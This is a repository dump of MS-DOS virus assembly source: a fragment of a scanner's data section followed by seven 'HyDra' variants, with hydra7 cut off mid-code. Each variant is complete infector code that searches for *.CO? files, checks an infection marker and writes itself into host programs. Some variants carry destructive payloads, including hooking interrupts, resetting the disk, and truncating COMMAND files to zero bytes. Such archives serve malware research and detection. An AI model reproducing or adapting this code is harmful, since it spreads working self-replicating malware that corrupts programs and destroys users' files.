is_inf db "Is infected! Remove it? [Y/N]$ "
_clean db " File is now clean....$"
is_cle db "is clean...$"
error_open db " Error open file$ ";shouldnt happen. . .
resident db "Virus is already resident, aborting$"
fname_buf db 65 dup (?) ;fname = max 64, but ah well!
linefeed db 0ah,0dh,'$' ;linefeed+ end of print marker.
count dw 0
inf dw 0
clean_f db ?
host_clean db "Self-checking OK!",13,10,36
host_infected db "Program is infected and will not run$",13,10
stat1 db 13,10
db "Number of files scanned: $"
stat2 db 13,10
db "Number of files cleaned: $"
end start
================================================================================
MSDOS/H-Index/Virus.MSDOS.Unknown.hydra1.asm
+196
View File
@@ -0,0 +1,196 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA1 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_12e equ 100h
data_13e equ 193h
data_14e equ 196h
data_15e equ 271h
data_16e equ 293h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra1 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-1 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
data_11 db 'HYDRA$'
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. $'
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,193h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_13e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,193h
mov cs:data_8,ax
cmp word ptr ds:data_14e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
xor ax,ax ; Zero register
mov ax,0F00h
int 10h ; Video display ah=functn 0Fh
; get state, al=mode, bh=page
; ah=columns on screen
mov ah,0
int 10h ; Video display ah=functn 00h
; set display mode in al
mov ax,200h
mov dh,6
mov dl,25h ; '%'
int 10h ; Video display ah=functn 02h
; set cursor location in dx
xor dx,dx ; Zero register
mov dx,offset data_11 ; ('HYDRA')
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ax,200h
mov dh,17h
mov dl,0
int 10h ; Video display ah=functn 02h
; set cursor location in dx
mov dx,offset copyright ; ('Copyright (c)')
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ax,200h
mov dh,18h
mov dl,0
int 10h ; Video display ah=functn 02h
; set cursor location in dx
mov ax,3504h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ax,es
mov dx,bx
mov ds,ax
mov ax,2509h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_15e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,data_16e
mov di,data_12e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra1 endp
seg_a ends
end start
MSDOS/H-Index/Virus.MSDOS.Unknown.hydra2.asm
+164
View File
@@ -0,0 +1,164 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA2 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 100h
data_2e equ 235h
data_3e equ 257h
data_4e equ 522h
psp_cmd_size equ 80h
data_15e equ 157h
data_16e equ 15Ah
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra2 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_7 db 'HyDra-2 Beta - Not For Release'
db '. *.CO?'
db 0
data_10 dw 0, 8B39h
data_12 dw 0
data_13 db 0
db 29 dup (0)
data_14 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,157h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_13
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_7+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_14
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_15e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,157h
mov cs:data_12,ax
cmp word ptr ds:data_16e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_12
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
xor ax,ax ; Zero register
xor ax,ax ; Zero register
mov ds,ax
mov bx,data_4e
mov ah,0FFh
mov [bx],ah
xor ax,ax ; Zero register
int 13h ; Disk dl=drive 0 ah=func 00h
; reset disk, al=return status
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_2e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_10,0
mov word ptr cs:data_10+2,es
pop bx
jmp dword ptr cs:data_10
push ds
pop es
mov cx,0FFFFh
mov si,data_3e
mov di,data_1e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra2 endp
seg_a ends
end start
MSDOS/H-Index/Virus.MSDOS.Unknown.hydra3.asm
+163
View File
@@ -0,0 +1,163 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA3 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_11e equ 100h
data_12e equ 156h
data_13e equ 159h
data_14e equ 234h
data_15e equ 256h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra3 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-3 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,156h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_12e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,156h
mov cs:data_8,ax
cmp word ptr ds:data_13e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
mov ax,3504h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ax,es
mov dx,bx
mov ds,ax
mov ax,2513h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_14e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,data_15e
mov di,data_11e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra3 endp
seg_a ends
end start
MSDOS/H-Index/Virus.MSDOS.Unknown.hydra4.asm
+163
View File
@@ -0,0 +1,163 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA4 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 28-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_11e equ 100h
data_12e equ 154h
data_13e equ 157h
data_14e equ 232h
data_15e equ 254h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra4 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-4 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,154h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_12e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,154h
mov cs:data_8,ax
cmp word ptr ds:data_13e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
mov ax,3540h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov dx,bx
push es
pop ds
mov ax,2513h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_14e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,data_15e
mov di,data_11e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra4 endp
seg_a ends
end start
MSDOS/H-Index/Virus.MSDOS.Unknown.hydra5.asm
+189
View File
@@ -0,0 +1,189 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA5 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 21-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 23Eh
psp_cmd_size equ 80h
data_17e equ 187h
data_18e equ 18Ah
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra5 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_4 db 'HyDra-5 Beta - Not For Release'
db '. *.CO?'
db 0
data_7 dw 0, 8B39h
data_9 dw 0
data_10 db 0
db 29 dup (0)
data_11 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,187h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_10
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_4+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_11
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_17e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,187h
mov cs:data_9,ax
cmp word ptr ds:data_18e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
;* jc loc_6 ; Jump if carry Set
db 72h, 54h
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_9
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
inc word ptr [bx+si]
add [bx+si],al
add [bx+si],al
pop ds
add [bx],bh
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
inc bp
pop ax
inc bp
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add ds:data_1e[bx+si],bh
push ax
push cs
pushf ; Push flags
mov cl,13h
mov dx,201h
push cs
pop ds
jmp dword ptr data_14
mov ah,4Ch ; 'L'
int 21h ; DOS Services ah=function 4Ch
; terminate with al=return code
data_14 dd 000C0h
db 0CDh, 20h
loc_7:
xor di,di ; Zero register
mov si,265h
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_7,0
mov word ptr cs:data_7+2,es
pop bx
jmp dword ptr cs:data_7
push ds
pop es
mov cx,0FFFFh
mov si,287h
mov di,100h
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra5 endp
seg_a ends
end start
MSDOS/H-Index/Virus.MSDOS.Unknown.hydra6.asm
+174
View File
@@ -0,0 +1,174 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA6 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_14e equ 174h
data_15e equ 177h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra6 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-6 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
data_11 db 'COMMAND.*', 0
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,174h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_14e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,174h
mov cs:data_8,ax
cmp word ptr ds:data_15e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_8
nop
loc_6:
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
push dx
mov dx,offset data_11 ; ('COMMAND.*')
mov ah,4Eh ; 'N'
xor cx,cx ; Zero register
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_7:
mov ah,3Ch ; '<'
xor cx,cx ; Zero register
mov dx,offset data_10
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
mov bx,ax
jc loc_5 ; Jump if carry Set
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jc loc_5 ; Jump if carry Set
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_7 ; Jump if carry=0
loc_8:
xor di,di ; Zero register
mov si,252h
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,274h
mov di,100h
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra6 endp
seg_a ends
end start
MSDOS/H-Index/Virus.MSDOS.Unknown.hydra7.asm
+175
View File
@@ -0,0 +1,175 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA7 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_16e equ 170h
data_17e equ 173h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra7 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_4 db 'HyDra-7 Beta - Not For Release'
db '. *.CO?'
db 0
data_7 dw 0, 8B39h
data_9 dw 0
data_10 db 0
db 29 dup (0)
data_11 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
data_12 db 2Ah
db 2Eh, 45h, 58h, 45h, 00h
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,170h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_10
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
